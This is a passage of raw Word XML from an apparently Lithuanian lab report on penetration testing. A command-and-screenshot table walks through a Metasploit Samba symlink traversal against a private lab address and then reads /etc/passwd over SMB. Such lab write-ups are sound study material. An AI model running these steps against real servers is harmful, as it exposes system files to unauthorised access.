        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">smb: \rootfs\etc\&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>more passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796F5727" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6F71A6" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167B829" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>daemon:x:1:1:daemon:/usr/sbin:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7310C1FA" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>bin:x:2:2:bin:/bin:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE7FCA" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>[..]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A10784C" w14:textId="26AC7FF2" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3240"/>
        <w:gridCol w:w="6210"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w14:paraId="62D0E5DD" w14:textId="77777777" w:rsidTr="009E49CB">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="14E3E988" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF"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Atliktas veiksmas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6210" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0682CBCB" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Rezultatas (paslaugos, prievadai)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w14:paraId="17410F67" w14:textId="77777777" w:rsidTr="004C1EA1">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="030F3531" w14:textId="7691754E" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="009E49CB" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="009E49CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>mbclient</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009E49CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>-L //192.168.177.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6210" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="79784D79" w14:textId="79392072" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="009E49CB" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F9EC08F" wp14:editId="284E0432">
                  <wp:extent cx="3999230" cy="1881505"/>
                  <wp:effectExtent l="0" t="0" r="127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9230" cy="1881505"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w14:paraId="1D6001E5" w14:textId="77777777" w:rsidTr="004C1EA1">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35F890F3" w14:textId="358948D9" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="009E49CB" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6210" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1BDD8C67" w14:textId="69539A65" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="009E49CB" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47571365" wp14:editId="728FE972">
                  <wp:extent cx="3999230" cy="2696210"/>
                  <wp:effectExtent l="0" t="0" r="127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9230" cy="2696210"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E49CB" w:rsidRPr="00607DC0" w14:paraId="25372F23" w14:textId="77777777" w:rsidTr="009E49CB">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="20F46FBA" w14:textId="681E4466" w:rsid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t>use auxiliary/admin/smb/samba_symlink_traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6210" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C6EE43F" w14:textId="1F759B7B" w:rsidR="009E49CB" w:rsidRDefault="009E49CB" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DDA7F78" wp14:editId="42590ADE">
                  <wp:extent cx="3994150" cy="42481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4150" cy="424815"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E49CB" w:rsidRPr="00607DC0" w14:paraId="57DB3BDC" w14:textId="77777777" w:rsidTr="003F57F6">
        <w:trPr>
          <w:trHeight w:val="377"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7DD8C1A3" w14:textId="6633FF2C" w:rsid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lastRenderedPageBreak/>
              <w:t>set RHOST 192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>177</w:t>
            </w:r>
            <w:r w:rsidRPr="009E49CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6210" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7F89785B" w14:textId="2FA57465" w:rsidR="009E49CB" w:rsidRDefault="009E49CB" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="796F0840" wp14:editId="339C7CFB">
                  <wp:extent cx="3994150" cy="205105"/>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4150" cy="205105"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E49CB" w:rsidRPr="00607DC0" w14:paraId="7C5CD8C0" w14:textId="77777777" w:rsidTr="003F57F6">
        <w:trPr>
          <w:trHeight w:val="431"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="310DE15A" w14:textId="0CC44002" w:rsid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t>set SMBSHARE tmp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6210" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7C8B0572" w14:textId="2DC33E75" w:rsidR="009E49CB" w:rsidRDefault="009E49CB" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="363FDCA8" wp14:editId="4B00DDD1">
                  <wp:extent cx="3994150" cy="27432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4150" cy="274320"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E49CB" w:rsidRPr="00607DC0" w14:paraId="5A8BBABF" w14:textId="77777777" w:rsidTr="003F57F6">
        <w:trPr>
          <w:trHeight w:val="1439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43829A1F" w14:textId="0A9031EE" w:rsid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t>exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6210" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="045F63FE" w14:textId="2727643B" w:rsidR="009E49CB" w:rsidRDefault="009E49CB" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D3CEDD2" wp14:editId="157C6895">
                  <wp:extent cx="3994150" cy="90805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4150" cy="908050"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E49CB" w:rsidRPr="00607DC0" w14:paraId="1D50E0A4" w14:textId="77777777" w:rsidTr="003F57F6">
        <w:trPr>
          <w:trHeight w:val="1331"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5A1E59D1" w14:textId="79471438" w:rsidR="009E49CB" w:rsidRPr="009E49CB" w:rsidRDefault="009E49CB" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6210" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59689CB6" w14:textId="68EAD684" w:rsidR="009E49CB" w:rsidRDefault="009E49CB" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14347706" wp14:editId="3BC6D854">
                  <wp:extent cx="3937000" cy="784225"/>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37000" cy="784225"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E49CB" w:rsidRPr="00607DC0" w14:paraId="6A37CF21" w14:textId="77777777" w:rsidTr="003F57F6">
        <w:trPr>
          <w:trHeight w:val="1349"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="34163B7B" w14:textId="19781630" w:rsidR="009E49CB" w:rsidRPr="009E49CB" w:rsidRDefault="009E49CB" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E49CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>smbclient //192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>177</w:t>
            </w:r>
            <w:r w:rsidRPr="009E49CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidRPr="009E49CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>/tmp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6210" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="53F49CFF" w14:textId="1E60FCA7" w:rsidR="009E49CB" w:rsidRDefault="009E49CB" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09C95E33" wp14:editId="0D2F819A">
                  <wp:extent cx="3590925" cy="828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925" cy="828675"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E49CB" w:rsidRPr="00607DC0" w14:paraId="411526E1" w14:textId="77777777" w:rsidTr="003F57F6">
        <w:trPr>
          <w:trHeight w:val="611"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7770EA8D" w14:textId="651535A2" w:rsidR="009E49CB" w:rsidRPr="009E49CB" w:rsidRDefault="003F57F6" w:rsidP="003F57F6">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F57F6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>cd rootfs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6210" w:type="dxa"/>
            <w:tcBorders>
